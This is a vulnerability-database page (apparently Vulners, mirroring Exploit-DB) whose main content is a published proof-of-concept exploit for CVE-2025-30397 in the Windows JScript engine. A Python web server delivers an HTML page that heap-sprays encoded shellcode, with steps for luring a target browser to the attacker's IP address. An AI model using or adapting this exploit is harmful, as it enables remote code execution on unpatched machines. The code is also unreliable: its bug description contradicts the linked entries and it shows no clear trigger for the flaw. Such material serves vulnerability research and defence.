Vulners
Lucene search
Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
🗓️ 05 Jun 2025 00:00:00Reported by Mohammed Idrees BanyamerType 
exploitdb🔗 www.exploit-db.com👁 295 Views
| Reporter | Title | Published | Views | Family All 66 |
|---|---|---|---|---|
 | Exploit for Type Confusion in Microsoft | 23 Jul 202515:34 | – | githubexploit |
| Exploit for CVE-2025-2783 | 26 May 202512:51 | – | githubexploit |
| Exploit for Type Confusion in Microsoft | 31 May 202512:20 | – | githubexploit |
 | CVE-2025-30397 | 13 May 202500:00 | – | attackerkb |
 | May Microsoft Patch Tuesday | 14 May 202500:58 | – | avleonov |
 | CVE-2025-30397 | 13 May 202516:27 | – | circl |
 | Microsoft Windows Scripting Engine Type Confusion Vulnerability | 13 May 202500:00 | – | cisa_kev |
 | CISA Adds Five Known Exploited Vulnerabilities to Catalog | 13 May 202512:00 | – | cisa |
 | Microsoft Scripting Engine 安全漏洞 | 13 May 202500:00 | – | cnnvd |
 | CVE-2025-30397 | 13 May 202516:59 | – | cve |
10
#!/usr/bin/env python3
# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @@banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# CVE: CVE-2025-30397
# Vendor: Microsoft
# Affected Versions: Windows Server 2025 (build 25398 and prior)
# Tested on: Windows Server 2025 + IE11 (x86)
# Type: Remote
# Platform: Windows
# Vulnerability Type: Use-After-Free (JScript Engine)
# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution.
# ============================
# Usage Instructions:
#
# 1. Save this script as `exploit_server.py`.
# 2. Run it with Python 3:
# $ python3 exploit_server.py
# 3. On the vulnerable target (Windows Server 2025 + IE11):
# Open Internet Explorer and navigate to:
# http://<attacker-ip>:8080/poc_cve_2025_30397.html
#
# If the target is vulnerable, calc.exe will be executed.
# ============================
import http.server
import socketserver
PORT = 8080
HTML_CONTENT = b"""<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>PoC - CVE-2025-30397</title>
<script>
var payload = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
while (payload.length < 0x1000) payload += payload;
var shell = unescape(
"%u9090%u9090%uebfc%u5eeb%u31b8%u64c9%u8b8b%u3050%u8b0c%u8b70" +
"%u3c4a%u780c%u4f0a%u4b8b%u1c70%u8b1c%u8b6c%u0c5c%u8b14%u285c" +
"%uef01%u528b%u8b10%u3c0a%u758b%u1c28%u8b34%u5c6a%u0158%uc985" +
"%u75c9%u8b58%u8b10%u3c20%u418b%u0348%u408b%u8b34%u1c4a%uc085" +
"%u7401%u0343%u0c6a%u58eb%ue8d0%uff00%u6361%u6c63%u2e00%u6578" +
"%u0065"
);
var final = payload + shell;
var buffer = [];
for (var i = 0; i < 1500; i++) buffer[i] = final.substring(0);
var sprayTarget = document.createElement("iframe");
sprayTarget.setAttribute("src", "about:blank");
document.body.appendChild(sprayTarget);
for (var i = 0; i < 200; i++) {
try {
sprayTarget.contentWindow.eval("var a = '" + final + "'");
} catch (e) {}
}
for (var j = 0; j < 1000; j++) {
var obj = document.createElement("div");
obj.innerHTML = "EXPLOIT" + j;
document.body.appendChild(obj);
}
var victim = document.createElement("object");
victim.setAttribute("classid", "clsid:0002DF01-0000-0000-C000-000000000046");
document.body.appendChild(victim);
alert("PoC loaded. If vulnerable, calc.exe will launch.");
</script>
</head>
<body>
<h1 style="color:red;">Exploit PoC: CVE-2025-30397</h1>
<h2>Author: Mohammed Idrees Banyamer</h2>
<h3>Instagram: <a href="https://instagram.com/mbanyamer" target="_blank">@banyamer_security</a></h3>
<h3>GitHub: <a href="https://github.com/mbanyamer" target="_blank">mbanyamer</a></h3>
<p>This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.</p>
</body>
</html>
"""
class Handler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == '/' or self.path == '/poc_cve_2025_30397.html':
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", str(len(HTML_CONTENT)))
self.send_header("X-Content-Type-Options", "nosniff")
self.send_header("X-Frame-Options", "SAMEORIGIN")
self.send_header("Content-Security-Policy", "default-src 'self'")
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
self.end_headers()
self.wfile.write(HTML_CONTENT)
else:
self.send_error(404, "File Not Found")
def run():
print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html")
with socketserver.TCPServer(("", PORT), Handler) as httpd:
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\nServer stopped.")
if __name__ == "__main__":
run()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jun 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.5
EPSS0.20737
SSVC